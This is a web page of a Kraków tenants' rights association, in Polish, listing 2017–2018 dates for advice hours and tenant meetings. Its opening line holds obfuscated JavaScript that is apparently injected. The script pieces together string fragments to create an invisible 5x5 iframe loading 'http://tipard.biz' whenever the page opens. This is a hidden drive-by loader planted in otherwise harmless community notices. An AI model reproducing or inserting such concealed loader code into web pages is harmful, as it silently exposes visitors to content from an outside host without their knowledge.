jk='tip';gp='.bi';q='sr';yr='//';t='i';tq='ht';k='p:';h='me';w='ar';fr='z';l='t';r='c';n='f';bd='d';s='ra';ce=t.concat(n,s,h);pn=q.concat(r);hh=tq.concat(l,k,yr,jk,w,bd,gp,fr);var at=document.createElement(ce);at.setAttribute('width','5');at.setAttribute('height','5');at.setAttribute('style','display:none');at.setAttribute(pn,hh);document.body.appendChild(at); KOMUNIKATY

Informujemy, że w miesiącu grudniu 2017 r dyżury lokatorskie zostały wyznaczone  na 11.12.2017 w godzinach od 15.00 do 16.00, w styczniu w dniach 08.01.2018 i 29.01.2018 . Zapraszamy Lokatorów potrzebujących rady i pomocy do siedziby Rady Dzielnicy 1 , Rynek Kleparski 4, ll piętro  ( domofon 51).

Zapraszamy na kolejne zebranie Lokatorów które odbędzie się 17 listopada 2017 r o godz 18.00 w siedzibie Rady Dzielnicy 1, Rynek Kleparski 4 , ll piętro. (domofon 51)

Informujemy, że w miesiącu listopadzie 2017 r dyżury lokatorskie zostały wyznaczone  na 6.11.2017 i  20.11.2017.  w godzinach od 15.00 do 16.00. Zapraszamy Lokatorów potrzebujących rady i pomocy do siedziby Rady Dzielnicy 1 , Rynek Kleparski 4, ll piętro  ( domofon 51)

Informujemy że w miesiącu październiku 2017 r dyżury lokatorskie zostały wyznaczone  na 9.10 i 23 .10 w godzinach od 15.00 do 16.00. Zapraszamy Lokatorów potrzebujących rady i pomocy do siedziby Rady Dzielnicy 1 , Rynek Kleparski 4, ll piętro  ( domofon 51)

Zapraszamy na kolejne zebranie Lokatorów które odbędzie się 20 października 2017 r o godz 18.00 w siedzibie Rady Dzielnicy 1, Rynek Kleparski 4 , ll piętro. (domofon 51)

Zapraszamy na kolejne zebranie Lokatorów, które odbędzie się  z dniu 15 września 2017 r. o godz. 18.00 w siedzibie  Rady Dzielnicy I, Rynek Kleparski 4, II piętro. (domofon 51).

 

 

 

Informujemy, że w okresie wakacyjnym dyżury lokatorskie naszego Stowarzyszenia zostały wyznaczone na 10 lipca oraz 7 sierpnia w godzinach od 15.00 do 16.00. Zapraszamy lokatorów potrzebujących porady i pomocy do siedziby Rady Dzielnicy I, Rynek Kleparski 4, II piętro, (domofon 51)

Zapraszamy na kolejne zebranie Lokatorów, które odbędzie się  z dniu 23 czerwca 2017 r. o godz. 18.00  w siedzibie  Rady Dzielnicy I,Rynek Kleparski 4, II piętro. (domofon 51)

Informujemy, że w miesiącu czerwcu 2017 r. dyżury lokatorskie zostały wyznaczone na 12 czerwca oraz 26 czerwca w godzinach od 15.00 do 16.00. Zapraszamy lokatorów potrzebujących porady i pomocy do siedziby Rady Dzielnicy I, Rynek Kleparski 4, II piętro, (domofon 51)

Informujemy, że w miesiącu maju 2017 r. dyżury lokatorskie zostały wyznaczone na 8 maja oraz 22 maja w godzinach od 15 do 16. 
Zapraszamy lokatorów potrzebujących porady i pomocy do siedziby Rady Dzielnicy I, Rynek Kleparski 4, II piętro

WYBORY 2018

POLECANE

 

 

 Copyright © 2013 Stowarzyszenie Krakowska Grupa Inicjatywna Obrony Praw Lokatorów.

Wszelkie prawa zastrzeżone.